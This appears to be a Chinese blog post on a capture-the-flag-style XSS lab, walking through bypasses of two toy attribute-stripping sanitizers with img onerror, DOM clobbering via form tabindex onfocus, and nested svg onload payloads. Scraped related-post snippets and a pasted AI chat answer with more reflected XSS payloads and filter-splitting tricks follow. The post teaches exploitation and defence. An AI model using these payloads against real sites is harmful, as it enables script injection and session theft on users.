XSS绕过案例---使用<svg>或者<tabindex>

已于 2023-01-05 12:30:14 修改
阅读量470 收藏 1
点赞数
分类专栏: 安全 文章标签: 前端 servlet javascript
于 2022-08-05 12:43:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_63069714/article/details/126175365
版权

目录

一次循环

测试结果

两次循环

绕过方法1:DOM cobbing

绕过方法2:不进循环

一次循环

<!DOCTYPE html>
<html lang="en">
 
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <form id=x>
        <input id=attributes>
        <input id=attributes>
    </form>
</body>
<script>
    console.info(x.attributes);
    const data = decodeURIComponent(location.hash.substr(1));
    const root = document.createElement('div');
    root.innerHTML = data;
 
    //这里模拟了XSS过滤的过程,方法是移除所有属性
    for (let el of root.querySelectorAll('*')) {
        for (let attr of el.attributes) {
            el.removeAttribute(attr.name);
        }
    }
    document.body.appendChild(root); 
</script>

代码分析

   const data = decodeURIComponent(location.hash.substr(1));       #截取#号后面的值
   const root = document.createElement('div');       #创建一个div
   root.innerHTML = data;        #然后将#号后面的值赋值给div
   for (let el of root.querySelectorAll('*')) {  #选中div下面的所有子元素
       for (let attr of el.attributes) {           #获取子元素的所有属性
           el.removeAttribute(attr.name);   #删除获取到的所有属性

测试结果

我们传递了<img src=1 οnerrοr=alert(1)>

但是却发现src=1的属性被删除了,οnerrοr=alert(1)属性却还保留着,这是为什么呢?我们先了解一下这里的删除顺序。我们使用断点调试测试它的顺序

我们先一步步调试查看值的情况,通过断点调试,我们发现src作为第一个属性进入后被删除了,剩下的属性onerror仅一位,但是循环次数大于字符串个数时就不能删除了属性了。

我们使用一个python代码测试删除元素的顺序:

我们发现在a数组下,我们仅取出来了3个值,在预期中我们应该取出6个值,这就是应该边循环边删除的原因造成的。 

这就有很大的问题,因为删除元素时因为索引问题我们不清楚到底删除了哪些元素,所以我们仅需要进行多次尝试就可以绕过一次循环:

<img test=aaa src=1 title=bbb οnerrοr=alert(1)>

两次循环

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    
</body>
<script>
    const data = decodeURIComponent(location.hash.substr(1));;
    const root = document.createElement('div');
    root.innerHTML = data;
   
    // 这里模拟了XSS过滤的过程,方法是移除所有属性,sanitizer
    for (let el of root.querySelectorAll('*')) {
     let attrs = [];
     for (let attr of el.attributes) {
      attrs.push(attr.name);
     }
     for (let name of attrs) {
      el.removeAttribute(name);
     }
    }    
     document.body.appendChild(root); 
</script>
</html>

两次循环的题是将属性先放入一个数组里面再进行删除,这个时候就不存在一次循环的问题。

所以我们使用两种方法进行绕过。

绕过方法1:DOM cobbing

将进入循环的东西不放入我们需要的代码,这样即使删除了也没有关系

那我们如果让没有用到的属性进入循环,需要的又没有进入循环呢?

tabindex:全局属性,指示其元素是否可以聚焦,以及它是否在何处参与顺序键盘导航。使用Tab键获取焦点。

<form%20 tabindex=1 οnfοcus="alert(1);this.removeAttribute('onfocus'); "autofocus="true"><input name=attributes><input name=attributes></form>

 这样就是将<form%20 tabindex=1 οnfοcus="alert(1);this.removeAttribute('onfocus'); "autofocus="true">进行了触发,删除的是后面的<input>里面的属性

绕过方法2:不进循环

<svg><svg/οnlοad=alert(1)>

为什么一个<svg>没有成功,两个就成功了?--- 它可以在过滤代码执行以前,提前执行恶意代码。

        svg标签会阻塞DOM的构造。JS环境里对DOM操作又会导致回流,为DOM树构造造成额外影响。在script标签内的JS执行完毕以后,DOM树才会构建完成,接着才会加载后面的内容,然后发现加载内容出错才会触发error事件。

就是恶意代码还没有进入循环就已经执行了,所以后面无论进不进循环都没有什么意义了。

XSS总结:跨站脚本(XSS)攻击向量(精)
墨痕诉清风的博客
10-13 429
事件处理 不需要用户交互的事件处理程序 激活元素时触发(IE) <a id=x tabindex=1 onactivate=alert(1)></a> 页面打印后触发(Chrome、Firefox、IE) <body onafterprint=alert(1)> CSS动画取消时触发(Firefox) <style>@keyfra......
【Portswigger-web-security-academy】xss lab
No Title
12-29 672
Lab: Reflected XSS into HTML context with all tags blocked except custom ones 题目提示是拦截了所有html标签,只能使用自定义标签。先尝试在搜索框中写入自定义标签: <custom id=test> 查看网页源代码: <header class="notification-header"> </header> <section class=blog-header> &l
xss绕过思路讲解和案例演示
北冥有鱼
04-24 573
一、xss绕过-过滤-转换 前面的XSS讲过,有限制字符这样的设置,是通过前端来设置的,我们通过抓包重放或者修改html前端代码就能绕过这个安全措施,前端虽然可以去做一些辅助的安全措施,但实际上它是没有太大作用的 大小写混合,一般的网页会通过匹配或者函数来给识别过滤出来,如果网页没有对大写进行限制或者大小写混合进行限制,那么就会通过大小写混合来绕过。 举个栗子: 这里通过onerror可以来...
XSS练习---一次循环和两次循环问题
qq_52016943的博客
08-02 365
XSS
渗透测试--利用SVG进行XSS和XXE
lza20001103的博客
03-12 1171
渗透测试--利用SVG进行XSS和XXE
复现一次循环和两次循环
S_cx666的博客
08-03 435
复现一次循环和两次循环
xss漏洞-svg标签】详解svg标签+触发XSS
06-29 8214
svg标签的触发与实战】
SVG格式进行xss与xxe
yggcwhat
08-14 2003
SVG格式进行xss与xxe
XSS高级 svg 复现一个循环问题以及两个循环问题
ikta的博客
08-06 1083
再走一步,走到img了,显示打印alert(1)但还没弹窗,很明显js把dom树阻塞了,js执行完毕,img才开始执行,意味着img标签逃不过js的过滤。下面是remove,把src属性移除掉,onerror属性向前移一位,然后索引因为没有下一位了,所以循环结束,onerror属性也就留了下来。关键的是去看img中的attributes,有两个属性,一个src,一个onerror,看上去像数组一样的一个东西,有索引0和索引1。可以很明显的看到,最外层的是svg0,除了外层,里面的是svg2和svg1。...
渗透测试基础-XSS漏洞简析
学习、分享、交流
05-17 6727
XSS原理:我们在一个网站上,输入【前端代码】,如果这个网站将我们的前端代码执行了,那么就说明这儿存在XSS漏洞。
xss绕过,payload全集
热门推荐
spang_33的博客
07-05 2万+
XSS总结:        xss分为三种,反射型xss,DOM型XSS及存储型XSS,不同类型的XSS的危害不同,有兴趣的可以观看一下csdn上明智讲的关于XSS攻击及原理。https://edu.youkuaiyun.com/course/detail/8585里面的修复原理和补丁代码讲的还是很详细的,他的课程还有利用xss获取cookie等。&lt;img src=x onerror=alert(1)&...
复现一个循环问题以及两个循环问题
newlife1441的博客
08-01 694
它删除了第一个获取的属性src但是为什么却没有删除后面的onerror属性呢?HTMLtabindex属性。
使用SVG格式的xss注入
weixin_30710457的博客
01-06 2893
svg文档:https://www.w3.org/TR/SVG2/ https://svg.digi.ninja/svg此页面中包含svg方式的xss注入场景。 源代码:https://github.com/digininja/svg_xss 电子书:Mario_Heiderich_OWASP_Sweden_The_image_that_called_me 几个示例如下: 示例一: ...
svgxss
'123'\x22
11-19 368
XSS SVG
火柴人的博客
10-11 655
https://mp.weixin.qq.com/s/AOTaXjN73zvvwLhCAueMaQ?tdsourcetag=s_pctim_aiomsg
利用SVG进行XSS和XXE
weixin_50464560的博客
03-30 1万+
最近我学习了一些新的xss技巧在这里分享给大家! 0x01 JavaScript without parentheses using DOMMatrix 背景 以前我们有两个解决xss不带括号的方法但是都有缺陷: 我们可以使用location=name来加载外部的代码,但是Safari不支持,另外还可以用οnerrοr=alert;throw 1来实现xss,但是现在大多数的waf都会过滤throw 1,因此今天我们就来介绍以下第三种方法。 DOMMatrix 题目的伪代码: 根据上面的要求我们不能使用"’
一个循环问题以及两个循环问题,其中两个循环需要两种不同方式实现
StriverNumber1的博客
08-03 1104
一个循环问题以及两个循环问题
<!doctype html> <html> <head> <meta charset="UTF-8"> <meta name="viewport" id="viewport" content="width=device-width, initial-scale=1"> </head> <center> <body> <h1>hello</h1> </body> </center> </html> 帮我给这串代码实现一个get型的简单htmlxss注入
最新发布
05-14
<think>好的,我现在需要帮助用户生成一个GET型的简单XSS注入示例,特别是针对包含<h1>hello</h1>的HTML代码。首先,我得回顾用户之前的对话,确保我理解他的需求。 用户之前已经询问过如何在<h1>标签中实现XSS注入,我给出了使用onclick事件属性和<script>标签的例子。现在用户想进一步实现GET请求的XSS攻击,也就是通过URL参数触发XSS。这意味着攻击载荷需要从URL的查询参数中获取并执行。 接下来,我需要考虑如何构造这样的示例。GET型XSS通常是通过将恶意脚本作为参数值插入到URL中,当页面加载时,参数值被输出到页面上,导致脚本执行。例如,如果页面有一个参数名为“name”,并且未经过滤就直接插入到HTML中,攻击者可以构造类似?name=<script>alert('XSS')</script>的URL。 用户提到要在现有的包含<h1>hello</h1>的代码中实现,所以我需要将XSS载荷嵌入到h1标签内。可能的做法是将h1的内容动态生成,比如从URL参数中获取值。例如,如果后端代码将name参数直接插入到h1标签中,攻击者可以通过修改name参数注入脚本。 但是用户可能需要一个具体的示例代码。我需要构造一个简单的HTML页面,其中h1的内容来自URL的GET参数,并且没有进行任何转义或过滤。例如: <h1>Hello, <?php echo $_GET['name']; ?></h1> 这种情况下,攻击者可以提交URL如:http://example.com/?name=<script>alert('XSS')</script>,这样脚本就会执行。 不过用户可能没有使用PHP,所以可能需要更通用的客户端示例。但通常,GET型XSS需要服务器端将参数值输出到页面中。如果只是静态HTML,可能无法直接实现,除非有服务端处理。但为了示例,可以假设有一个服务端将参数输出到页面。 另外,引用[1]中提到了标签语法替换的方法,比如拆分script标签来绕过过滤。例如,使用<scr<script>ipt>来绕过简单的黑名单过滤。这个技巧可以用来构造更隐蔽的XSS载荷。 引用[2]提到了Jsoup库用于清理HTML,防止XSS,所以如果目标站点使用类似库,攻击可能需要更高级的绕过方法。但用户需要的是简单示例,所以可能不需要考虑这些。 引用[3]提到<style>标签用于CSS,但可能可以用来进行XSS,不过不太常见,用户需求是GET型,所以可能还是用script标签或事件属性更直接。 现在,我需要确保示例正确,并且符合用户的需求。用户想要在现有的包含<h1>hello</h1>的代码中实现,所以可能需要将恶意代码嵌入到h1标签内部或附近。例如,如果h1的内容由GET参数控制,则注入的脚本会被插入到页面中。 总结,可能的示例包括: 1. 使用URL参数注入JavaScript代码到h1标签的内容中。 2. 利用事件属性如onmouseover,但GET型通常指的是反射型XSS,通过参数注入。 3. 使用拆分script标签或其他混淆技术绕过简单过滤。 需要给出具体的代码示例,并说明攻击者如何构造URL。同时,需要提醒用户这仅用于学习目的,并强调防御措施的重要性,比如输入过滤和输出编码,参考引用[2]提到的Jsoup库。</think>### 实现基于 GET 请求的反射型 XSS 注入示例 以下是通过 URL 的 GET 参数在 `<h1>` 标签中触发反射型 XSS 的两种典型方法,**假设目标网站未对输入参数进行过滤或转义处理**: --- #### **示例 1:直接在 `<h1>` 内容中注入脚本** 若页面动态渲染 URL 参数到 `<h1>` 标签内(例如 PHP 后端代码): ```html <!-- 假设后端代码:<h1>Hello, <?php echo $_GET['name']; ?></h1> --> http://example.com/vulnerable_page.php?name=<script>alert('XSS')</script> ``` 生成的前端代码将变为: ```html <h1>Hello, <script>alert('XSS')</script></h1> ``` 浏览器解析时会直接执行 `alert('XSS')`[^1]。 --- #### **示例 2:利用事件属性绕过简单过滤** 若网站仅过滤 `<script>` 标签,可通过事件属性触发(如 `onmouseover`): ```html http://example.com/vulnerable_page.php?name=<h1%20onmouseover="alert('XSS')">hello ``` 生成的前端代码: ```html <h1 onmouseover="alert('XSS')">hello</h1> ``` 当用户鼠标悬停在 `<h1>` 标签上时触发弹窗[^1]。 --- #### **示例 3:标签拆分绕过黑名单** 引用[1]提到的语法替换技巧,拆分 `<script>` 标签以绕过简单过滤: ```html http://example.com/vulnerable_page.php?name=<scr<script>ipt>alert('XSS')</scr</script>ipt> ``` 后端若未递归过滤,最终代码可能解析为: ```html <h1>hello<scr<script>ipt>alert('XSS')</scr</script>ipt></h1> ``` 实际浏览器会合并标签为: ```html <script>alert('XSS')</script> ``` --- ### **防御建议** 1. **输入过滤与输出编码**:使用如 Jsoup 的 HTML 清理库对用户输入进行白名单过滤[^2]。 ```java String safeInput = Jsoup.clean(userInput, Whitelist.basic()); ``` 2. **禁用内联脚本**:通过 HTTP 头 `Content-Security-Policy: script-src 'self'` 限制脚本来源。 3. **转义特殊字符**:将 `<`, `>`, `&` 等字符转换为实体(如 `<`, `>`)。 --- **注意**:以上代码仅用于安全研究,实际攻击行为违反法律。务必在授权环境下测试! --相关问题-- 1. 如何通过 HTTP 头部防御 XSS 攻击? 2. Jsoup 的白名单机制具体如何工作? 3. 除了 `<script>`,还有哪些 HTML 标签可能触发 XSS
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

努力学IT的小徐

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值